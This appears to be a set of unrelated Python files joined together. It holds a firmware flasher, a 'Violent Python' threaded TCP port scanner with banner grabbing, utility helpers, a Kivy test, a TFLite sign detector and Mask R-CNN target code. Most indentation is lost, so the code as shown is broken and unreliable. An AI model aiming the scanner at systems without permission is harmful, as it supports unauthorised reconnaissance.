print('\nWaiting for the devices to detach.', end='')
boot_dfus = get_dfu_devices(len(run_dfus_selected), is_boot=True)
if boot_dfus:
if not snum:
boot_dfus_selected = boot_dfus
else:
# Filter out
for dfu in boot_dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
boot_dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
if not boot_dfus_selected:
return
print('List of %d DFU devices:' % len(boot_dfus_selected))
for dfu in boot_dfus_selected:
print(dfu)
usb.util.dispose_resources(dfu.dev)
else:
return
if not unattended:
try_input('\nPress enter to flash all the listed devices.')
# Flash DFU mode devices
start = time.time()
results = []
dfus = get_dfu_devices(len(boot_dfus_selected), is_boot=True)
if dfus:
if not snum:
dfus_selected = dfus
else:
# Filter out
for dfu in dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
if not dfus_selected:
return
while dfus_selected:
print('Remaining %d devices. ' % len(dfus_selected), end='')
batch = dfus_selected[:MAX_PARALLEL_DEVICES]
print('Flashing a batch of %d devices...' % len(batch))
results += parallel_program(dfu_flash, batch, dfu_file)
dfus_selected = dfus_selected[MAX_PARALLEL_DEVICES:]
for dfu in batch:
usb.util.dispose_resources(dfu.dev)
else:
return
flash_summary(results, start)
# Wait until all devices are in runtime
print('\nWaiting for the devices to apply the new firmware.', end='')
dfus = get_dfu_devices(max(len(run_dfus),len(boot_dfus_selected)), is_boot=False, required=False)
def flash_summary(results, start):
print(
colorize(
'Elapsed: %s'
% time.strftime("%M m %S s", time.localtime(time.time() - start)),
colorama.Fore.YELLOW,
)
)
for result in results:
print('\t' + result)
print(
'Flashed %s of %d devices.'
% (
colorize(len([r for r in results if 'OK' in r]), colorama.Fore.GREEN),
len(results),
)
)
def dfu_flash(dfu, dfu_file, queue, pos=0):
'''Flash a list of DFU devices with the given file'''
snum = dfu.get_string(dfu.dev.iSerialNumber)
# Clear left-over errors
if dfu.get_status()[1] == kidfu.DfuState.DFU_ERROR:
dfu.clear_status()
# Flash
blocks = [dfu_file.data[i : i + 64] for i in range(0, len(dfu_file.data), 64)]
with tqdm.get_lock():
progress = tqdm(
total=len(blocks),
unit='B',
unit_scale=64,
miniters=0,
desc=colorize(snum, colorama.Fore.CYAN),
position=pos,
dynamic_ncols=True,
leave=True,
smoothing=0
)
for bnum, block in enumerate(blocks):
try:
dfu.write(bnum, block)
status = dfu.wait_while_state(kidfu.DfuState.DFU_DOWNLOAD_BUSY)
if status[1] != kidfu.DfuState.DFU_DOWNLOAD_IDLE:
queue.put('%s: Error %d' % (snum, status[1]))
return
except usb.core.USBError:
queue.put('%s: USB error' % snum)
return
with tqdm.get_lock():
progress.update(1)
with tqdm.get_lock():
progress.refresh()
progress.close()
dfu.leave()
status = dfu.get_status()
if status[1] == kidfu.DfuState.DFU_MANIFEST_SYNC:
queue.put('%s: OK' % snum)
return
queue.put('%s: Error finish' % snum)
def kbi_find_and_flash(dfu_file):
'''Flash a DFU file'''
# Count DFU devices
kidevs = kiserial.find_devices(has_uart=True)
# Flash bootloader running devices
if kidevs:
print('\nFound the following KBI devices:')
for dev in kidevs:
print(' %s' % dev)
try_input('Press Enter to flash them all.')
else:
sys_exit('No KBI devices found.')
# Program the devices
start = time.time()
results = parallel_program(kbi_flash, kidevs, dfu_file)
flash_summary(results, start)
def kbi_flash(kidev, dfu_file, queue, pos=0):
'''Flash a list of KBI devices with the given file'''
ctype = kicmds.FT_CMD
ccode = kicmds.CMD_FW_UP
crsp_val = kicmds.FT_RSP | kicmds.RC_VALUE
crsp_err = kicmds.FT_RSP | kicmds.RC_FWUERR
try:
dev = kiserial.KiSerial(kidev.port)
# Flash
blocks = [dfu_file.data[i : i + 64] for i in range(0, len(dfu_file.data), 64)]
with tqdm.get_lock():
progress = tqdm(
total=len(blocks),
unit='B',
unit_scale=64,
miniters=0,
desc=colorize(kidev.snum, colorama.Fore.CYAN),
position=pos,
dynamic_ncols=True,
leave=True,
smoothing=0
)
for bnum, block in enumerate(blocks):
# Payload is the block number plus the data
payload = struct.pack('>H', bnum) + block
# Keep sending the same block until the response matches
retries = 5
while retries:
kbi_req = kicmds.KBICommand(None, ctype, ccode, payload)
kbi_rsp, _ = dev.kbi_cmd(kbi_req)
if kbi_rsp.is_valid():
rtype = kbi_rsp.get_type()
rcode = kbi_rsp.get_code()
rpload = kbi_rsp.get_payload()
# Protocol error, finish
if rtype == crsp_err:
queue.put('%s: FWU error' % kidev.snum)
return
elif rtype == crsp_val and len(rpload) >= 2:
# Received block number
recv_bnum = struct.unpack('>H', rpload[:2])[0]
# Block sent successfully
if rcode == ccode and recv_bnum == bnum:
break
# Give some time to resend the block
time.sleep(5)
retries -= 1
if not retries:
queue.put(
'%s: Could not send block #%u after 5 retries.' % (kidev.snum, bnum)
)
return
with tqdm.get_lock():
progress.update(1)
# All went good, reset the device
with tqdm.get_lock():
progress.refresh()
progress.close()
dev.ksh_cmd('reset')
queue.put('%s: OK' % kidev.snum)
except:
queue.put('%s: Serial error' % kidev.snum)
def parallel_program(flash_func, devices, dfu_file):
'''Parallel programming'''
queue = queue_.Queue()
threads = []
results = []
tqdm.monitor_interval = 0
tqdm.set_lock(RLock())
for pos, dev in enumerate(devices):
threads.append(Thread(target=flash_func, args=[dev, dfu_file, queue, pos]))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
results.append(queue.get())
print('\n' * len(devices))
return results
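# Illustrative usage sketch (assumes kidfu provides a DFU file loader; the
# firmware filename is hypothetical):
#   dfu_file = kidfu.DfuFile('kinos.dfu')
#   dfu_find_and_flash(dfu_file, unattended=True)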
|
scanner.py
|
#!/usr/bin/env python3.6
import argparse
import socket
import threading
screen_lock = threading.Semaphore(value=1)
def conn_scan(target_host, target_port):
    conn_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        conn_socket.connect((target_host, target_port))
        conn_socket.send(b"Violent Python\r\n")
        results = conn_socket.recv(100)
        screen_lock.acquire()
        print(f"[+] {target_port}/tcp open")
        print(f"[+] {results}")
    except OSError:
        screen_lock.acquire()
        print(f"[-] {target_port}/tcp closed")
    finally:
        screen_lock.release()
        conn_socket.close()
def port_scan(target_host, target_ports):
try:
target_ip = socket.gethostbyname(target_host)
except:
print(f"[-] Cannot resolve '{target_host}'")
return
try:
target_name = socket.gethostbyaddr(target_ip)
print(f"\n[+] Scan results for: {target_name[0]}")
except:
print(f"\n[+] Scan results for: {target_ip[0]}")
socket.setdefaulttimeout(1)
for target_port in target_ports:
t = threading.Thread(target=conn_scan, args=(target_host, int(target_port)))
t.start()
def main():
parser = argparse.ArgumentParser(description="simple network scanner using TCP")
parser.add_argument("-H", dest="target_host", type=str, help="specify target host")
parser.add_argument("-P", dest="target_port", type=str, help="specify target port")
args = parser.parse_args()
    target_host = args.target_host
    target_ports = str(args.target_port).split(",")
    if target_host is None or args.target_port is None:
        print(parser.usage)
        exit(0)
    port_scan(target_host, target_ports)
if __name__ == '__main__':
main()
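# Example invocation (host and ports are illustrative):
#   python3 scanner.py -H scanme.nmap.org -P 21,22,80,443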
|
utils.py
|
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: Jun Zhu <jun.zhu@xfel.eu>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import os
import psutil
import socket
import multiprocessing as mp
import functools
import subprocess
from threading import RLock, Thread
import time
from .logger import logger
# profiler will only print out information if the execution of the given
# function takes more than the threshold value.
PROFILER_THRESHOLD = 1.0  # in ms
def profiler(info, *, process_time=False):
def wrap(f):
@functools.wraps(f)
def timed_f(*args, **kwargs):
if process_time:
timer = time.process_time
else:
timer = time.perf_counter
t0 = timer()
result = f(*args, **kwargs)
dt_ms = 1000 * (timer() - t0)
            if dt_ms > PROFILER_THRESHOLD:
logger.debug(f"Process time spent on {info}: {dt_ms:.3f} ms")
return result
return timed_f
return wrap
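# Minimal usage sketch (function name is illustrative): a debug line is logged
# only when the call takes longer than PROFILER_THRESHOLD milliseconds.
#   @profiler("assembling the train set")
#   def assemble(data):
#       ...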
class BlockTimer:
"""A context manager for measuring the execution time of a code block
For example::
>>> with BlockTimer("foo"):
... time.sleep(1)
...
Execution of foo: 1.001s
"""
def __init__(self, label="block", enabled=True):
"""Create the timer object
:param str label: A name to identify the block being timed.
:param bool enabled: Whether or not to enable this timer.
"""
self._label = label
self._enabled = enabled
def __enter__(self):
self.start = time.perf_counter()
return self
def __exit__(self, *_):
duration = time.perf_counter() - self.start
if self._enabled:
logger.info(f"Execution of {self._label}: {duration:.4f}s")
_NOT_FOUND = object()
class cached_property:
"""cached_property since Python3.8"""
def __init__(self, func):
self.func = func
self.attrname = None
self.__doc__ = func.__doc__
self.lock = RLock()
def __set_name__(self, owner, name):
if self.attrname is None:
self.attrname = name
elif name != self.attrname:
raise TypeError(
f"Cannot assign the same cached_property to two different "
f"names ({self.attrname!r} and {name!r})."
)
def __get__(self, instance, owner):
if instance is None:
return self
if self.attrname is None:
raise TypeError(
"Cannot use cached_property instance without calling "
"__set_name__ on it.")
try:
cache = instance.__dict__
except AttributeError:
# not all objects have __dict__ (e.g. class defines slots)
msg = (
f"No '__dict__' attribute on {type(instance).__name__!r} "
f"instance to cache {self.attrname!r} property."
)
raise TypeError(msg) from None
val = cache.get(self.attrname, _NOT_FOUND)
if val is _NOT_FOUND:
with self.lock:
# check if another thread filled cache while we awaited lock
val = cache.get(self.attrname, _NOT_FOUND)
if val is _NOT_FOUND:
val = self.func(instance)
try:
cache[self.attrname] = val
except TypeError:
msg = (
f"The '__dict__' attribute on "
f"{type(instance).__name__!r} instance does not "
f"support item assignment for caching "
f"{self.attrname!r} property."
)
raise TypeError(msg) from None
return val
def _get_system_cpu_info():
"""Get the system cpu information."""
class CpuInfo:
def __init__(self, n_cpus=None):
self.n_cpus = n_cpus
def __repr__(self):
return f"[CPU] count: {self.n_cpus}"
return CpuInfo(mp.cpu_count())
def _get_system_memory_info():
"""Get the system memory information."""
class MemoryInfo:
def __init__(self, total_memory=None, used_memory=None):
self.total_memory = total_memory
self.used_memory = used_memory
def __repr__(self):
return f"[Memory] " \
f"total: {self.total_memory / 1024**3:.1f} GB, " \
f"used: {self.used_memory / 1024**3:.1f} GB"
mem = psutil.virtual_memory()
return MemoryInfo(mem.total, mem.used)
def _get_system_gpu_info():
"""Get the system GPU information."""
class GpuInfo:
def __init__(self,
gpu_name=None,
total_memory=None,
used_memory=None):
self.name = gpu_name
self.total_memory = total_memory
self.used_memory = used_memory
def __repr__(self):
if self.name is None:
return f"[GPU] Not found"
return f"[GPU] " \
f"name: {self.name}, " \
f"total: {self.total_memory / 1024**3:.1f} GB, " \
f"used: {self.used_memory / 1024**3:.1f} GB"
command = ["nvidia-smi",
"--query-gpu=name,memory.total,memory.used",
"--format=csv,noheader,nounits"]
try:
p = psutil.Popen(command, stdout=subprocess.PIPE)
stdout, _ = p.communicate()
output = stdout.decode('UTF-8')
info = []
        for line in output.splitlines():
if line:
splitted = line.split(',')
if len(splitted) != 3:
logger.error(
f"Received unexpected query result for GPU: {line}")
info.append(GpuInfo())
else:
name = splitted[0]
total = int(splitted[1]) * 1024**2 # MB -> byte
used = int(splitted[2]) * 1024**2 # MB -> byte
info.append(GpuInfo(name, total, used))
if len(info) == 1:
return info[0]
return info
except FileNotFoundError as e:
# raised when 'nvidia-smi' does not exist
logger.debug(repr(e))
return GpuInfo()
except Exception as e:
# We don't want to prevent the app from starting simply because
# failing to get the GPU information.
logger.info(
f"Unexpected error when querying GPU information: {repr(e)}")
return GpuInfo()
def check_system_resource():
"""Check the resource of the current system"""
cpu_info = _get_system_cpu_info()
gpu_info = _get_system_gpu_info()
memory_info = _get_system_memory_info()
return cpu_info, gpu_info, memory_info
class _MetaSingleton(type):
"""Meta class and bookkeeper for Singletons."""
_instances = dict()
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super().__call__(*args, **kwargs)
return cls._instances[cls]
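# Usage sketch (class name is illustrative): every construction of a class that
# uses _MetaSingleton as its metaclass returns the same instance.
#   class Config(metaclass=_MetaSingleton):
#       pass
#   assert Config() is Config()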
def query_yes_no(question):
"""Ask a yes/no question and return the answer.
:param str question: the question string.
:return bool: True for yes and False for no.
"""
ans = input(f"{question} (y/n)").lower()
while True:
if ans not in ['y', 'yes', 'n', 'no']:
            ans = input('please enter yes (y) or no (n): ').lower()
continue
if ans == 'y' or ans == 'yes':
return True
if ans == 'n' or ans == 'no':
return False
def run_in_thread(daemon=False):
"""Run a function/method in a thread."""
def wrap(f):
@functools.wraps(f)
def threaded_f(*args, **kwargs):
t = Thread(target=f, daemon=daemon, args=args, kwargs=kwargs)
t.start()
return t
return threaded_f
return wrap
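# Usage sketch (function name is illustrative): the decorated call returns the
# started Thread so callers can join() it if needed.
#   @run_in_thread(daemon=True)
#   def poll_status():
#       ...
#   t = poll_status()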
def get_available_port(default_port):
"""Find an available port to bind to."""
port = default_port
with socket.socket() as s:
while True:
try:
s.bind(("127.0.0.1", port))
except OSError:
port += 1
else:
break
return port
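# Usage sketch: probe upwards from a preferred port until bind() succeeds,
# e.g. port = get_available_port(5555).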
|
test_main.py
|
from threading import Thread
from time import sleep
from unittest import mock
from kivy.app import App
from kivy.clock import Clock
from kivy_garden.xcamera.main import CameraApp, main
from tests.test_main import camera_release_workaround, patch_core_camera
def patch_picture_taken():
return mock.patch('kivy_garden.xcamera.main.CameraApp.picture_taken')
class TestMain:
"""
Tests the `main` module.
"""
def test_picture_taken(self):
"""
Checks the `picture_taken()` listener gets called on the running app.
"""
app_thread = Thread(target=main)
app_thread.start()
app = App.get_running_app()
filename = mock.sentinel
Clock.schedule_once(
lambda dt: app.root.ids.xcamera.dispatch(
'on_picture_taken', filename))
with patch_picture_taken() as m_picture_taken, patch_core_camera():
sleep(0.5) # FIXME: nondeterministic approach
# makes sure app thread is gracefully stopped before asserting
app.stop()
app_thread.join()
camera_release_workaround(app)
assert type(app) == CameraApp
assert m_picture_taken.mock_calls == [
mock.call(app.root.ids.xcamera, filename)]
|
tflite_run.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import os
import cv2
import numpy as np
from threading import Thread
from multiprocessing import Pipe
import importlib.util
from src.templates.workerprocess import WorkerProcess
class ObjectDetector(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""A thread for capturing the keyboard events.
Parameters
----------
outPs : list(Pipe)
List of output pipes.
"""
super(ObjectDetector,self).__init__(inPs, outPs)
self.outPs = outPs
self.inPs = inPs
# ===================================== START ========================================
def run(self):
super(ObjectDetector,self).run()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the read thread to transmite the received messages to other processes.
"""
runCar = Thread(name='ObjectDetect',target = self._object_detect, args = (self.outPs, self.inPs, ))
self.threads.append(runCar)
def _object_detect(self, outP, inP):
MODEL_NAME = "/home/pi/repos/Brain/src/utils/tflite" #args.modeldir
GRAPH_NAME = 'detect.tflite'
LABELMAP_NAME = 'labelmap.txt'
min_conf_threshold = float(0.30)
resW = 300
resH = 300
imW = 300
imH = 300
#use_TPU = args.edgetpu
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
#if use_TPU:
# from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
#if use_TPU:
# from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
#if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
# if (GRAPH_NAME == 'detect.tflite'):
# GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
#if use_TPU:
# interpreter = Interpreter(model_path=PATH_TO_CKPT,
# experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
# print(PATH_TO_CKPT)
#else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 128
input_std = 128
print(floating_model)
# Check output layer name to determine if this model was created with TF2 or TF1,
# because outputs are ordered differently for TF2 and TF1 models
outname = output_details[0]['name']
if ('StatefulPartitionedCall' in outname): # This is a TF2 model
boxes_idx, classes_idx, scores_idx = 1, 3, 0
else: # This is a TF1 model
boxes_idx, classes_idx, scores_idx = 0, 1, 2
# Initialize frame rate calculation
#frame_rate_calc = 1
#freq = cv2.getTickFrequency()
# Initialize video stream
#videostream = VideoStream(resolution=(imW,imH),framerate=5).start()
#time.sleep(1)
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
#t1 = cv2.getTickCount()
# Grab frame from video stream
#frame1 = videostream.read()
YMAX = 0
for sent_frames in inP:
frame_in = sent_frames.recv()
if frame_in is not None:
frame_rgb = frame_in[0]
# Acquire frame and resize to expected shape [1xHxWx3]
#frame = frame1.copy()
#frame_rgb = cv2.cvtColor(frame1, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
#input_data = np.expand_dims(frame_rgb, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[boxes_idx]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[classes_idx]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[scores_idx]['index'])[0] # Confidence of detected objects
detected_objects = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
flag = False
ymin = int(max(1,(boxes[i][0] * imH)))
ymax = int(min(imH,(boxes[i][2] * imH)))
YMAX = abs((ymax - ymin))
if ('ped' in labels[int(classes[i])] and YMAX > 40 and scores[i] >= 0.75):
flag = True
elif 'priority' in labels[int(classes[i])] and scores[i] >= 0.25 and YMAX > 30:
flag = True
elif 'parking' in labels[int(classes[i])] and scores[i] >= 0.20 and YMAX > 30:
flag = True
elif 'cross' in labels[int(classes[i])] and YMAX > 30 and scores[i] >= 0.55:
flag = True
elif 'stop' in labels[int(classes[i])] and scores[i] >= 0.25:
flag = True
#if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
if flag:
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
#YMAX = boxes[i][2] * imH
YMAX = abs((ymax - ymin))
cv2.rectangle(frame_rgb, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame_rgb, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame_rgb, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1) # Draw label text
'''
if ('ped' in label and YMAX > 40 and scores[i] >= 0.75):
detected_objects.append(label)
elif 'priority' in label and YMAX > 35:
detected_objects.append(label)
elif 'parking' in label and YMAX > 35:
detected_objects.append(label)
elif 'cross' in label and YMAX > 30 and scores[i] >= 0.55:
detected_objects.append(label)
elif 'stop' in label and scores[i] >= 0.45:
detected_objects.append(label)
'''
detected_objects.append(label)
for outPipe in outP:
outPipe.send([frame_rgb, detected_objects, YMAX])
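# Illustrative wiring sketch (pipe names are hypothetical; how the WorkerProcess
# base class is started depends on the rest of the project):
#   frame_recv, frame_send = Pipe(duplex=False)    # camera process writes frames here
#   result_recv, result_send = Pipe(duplex=False)  # detection results are read here
#   detector = ObjectDetector(inPs=[frame_recv], outPs=[result_send])
#   detector.run()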
|
bbox_regression.py
|
"""
This file has functions about generating bounding box regression targets
"""
from ..pycocotools.mask import encode
import numpy as np
from bbox_transform import bbox_overlaps, nonlinear_transform
from rcnn.config import config
import math
import cv2
import PIL.Image as Image
import threading
import Queue
bbox_transform = nonlinear_transform
def compute_bbox_regression_targets(rois, overlaps, labels):
"""
given rois, overlaps, gt labels, compute bounding box regression targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
print 'bbox regression: this should not happen'
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
print 'something wrong : zero ground truth rois'
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
def add_bbox_regression_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
print 'add bounding box regression targets'
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
num_classes = roidb[0]['gt_overlaps'].shape[1]
for im_i in range(num_images):
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
roidb[im_i]['bbox_targets'] = compute_bbox_regression_targets(rois, max_overlaps, max_classes)
if config.TRAIN.BBOX_NORMALIZATION_PRECOMPUTED:
# use fixed / precomputed means and stds instead of empirical values
means = np.tile(np.array(config.TRAIN.BBOX_MEANS), (num_classes, 1))
stds = np.tile(np.array(config.TRAIN.BBOX_STDS), (num_classes, 1))
else:
# compute mean, std values
class_counts = np.zeros((num_classes, 1)) + 1e-14
sums = np.zeros((num_classes, 4))
squared_sums = np.zeros((num_classes, 4))
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
if cls_indexes.size > 0:
class_counts[cls] += cls_indexes.size
sums[cls, :] += targets[cls_indexes, 1:].sum(axis=0)
squared_sums[cls, :] += (targets[cls_indexes, 1:] ** 2).sum(axis=0)
means = sums / class_counts
# var(x) = E(x^2) - E(x)^2
stds = np.sqrt(squared_sums / class_counts - means ** 2)
# normalized targets
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] -= means[cls, :]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] /= stds[cls, :]
return means.ravel(), stds.ravel()
def compute_mask_and_label(ex_rois, ex_labels, seg, flipped):
# assert os.path.exists(seg_gt), 'Path does not exist: {}'.format(seg_gt)
# im = Image.open(seg_gt)
# pixel = list(im.getdata())
# pixel = np.array(pixel).reshape([im.size[1], im.size[0]])
im = Image.open(seg)
pixel = list(im.getdata())
ins_seg = np.array(pixel).reshape([im.size[1], im.size[0]])
if flipped:
ins_seg = ins_seg[:, ::-1]
rois = ex_rois
n_rois = ex_rois.shape[0]
label = ex_labels
class_id = config.CLASS_ID
mask_target = np.zeros((n_rois, 28, 28), dtype=np.int8)
mask_label = np.zeros((n_rois), dtype=np.int8)
for n in range(n_rois):
target = ins_seg[int(rois[n, 1]): int(rois[n, 3]), int(rois[n, 0]): int(rois[n, 2])]
ids = np.unique(target)
ins_id = 0
max_count = 0
for id in ids:
if math.floor(id / 1000) == class_id[int(label[int(n)])]:
px = np.where(ins_seg == int(id))
x_min = np.min(px[1])
y_min = np.min(px[0])
x_max = np.max(px[1])
y_max = np.max(px[0])
x1 = max(rois[n, 0], x_min)
y1 = max(rois[n, 1], y_min)
x2 = min(rois[n, 2], x_max)
y2 = min(rois[n, 3], y_max)
iou = (x2 - x1) * (y2 - y1)
iou = iou / ((rois[n, 2] - rois[n, 0]) * (rois[n, 3] - rois[n, 1])
+ (x_max - x_min) * (y_max - y_min) - iou)
if iou > max_count:
ins_id = id
max_count = iou
if max_count == 0:
continue
# print max_count
mask = np.zeros(target.shape)
idx = np.where(target == ins_id)
mask[idx] = 1
mask = cv2.resize(mask, (28, 28), interpolation=cv2.INTER_NEAREST)
mask_target[n] = mask
mask_label[n] = label[int(n)]
return mask_target, mask_label
def compute_bbox_mask_targets_and_label(rois, overlaps, labels, seg, flipped):
"""
given rois, overlaps, gt labels, seg, compute bounding box mask targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
    :return: mask_targets, mask_label, ex_inds
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
print 'bbox regression: this should not happen'
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
print 'something wrong : zero ground truth rois'
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
mask_targets, mask_label = compute_mask_and_label(ex_rois, labels[ex_inds], seg, flipped)
return mask_targets, mask_label, ex_inds
def add_mask_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
print 'add bounding box mask targets'
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
# Multi threads processing
im_quene = Queue.Queue(maxsize=0)
for im_i in range(num_images):
im_quene.put(im_i)
def process():
while not im_quene.empty():
im_i = im_quene.get()
print "-----process img {}".format(im_i)
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
ins_seg = roidb[im_i]['ins_seg']
flipped = roidb[im_i]['flipped']
roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg, flipped)
threads = [threading.Thread(target=process, args=()) for i in xrange(10)]
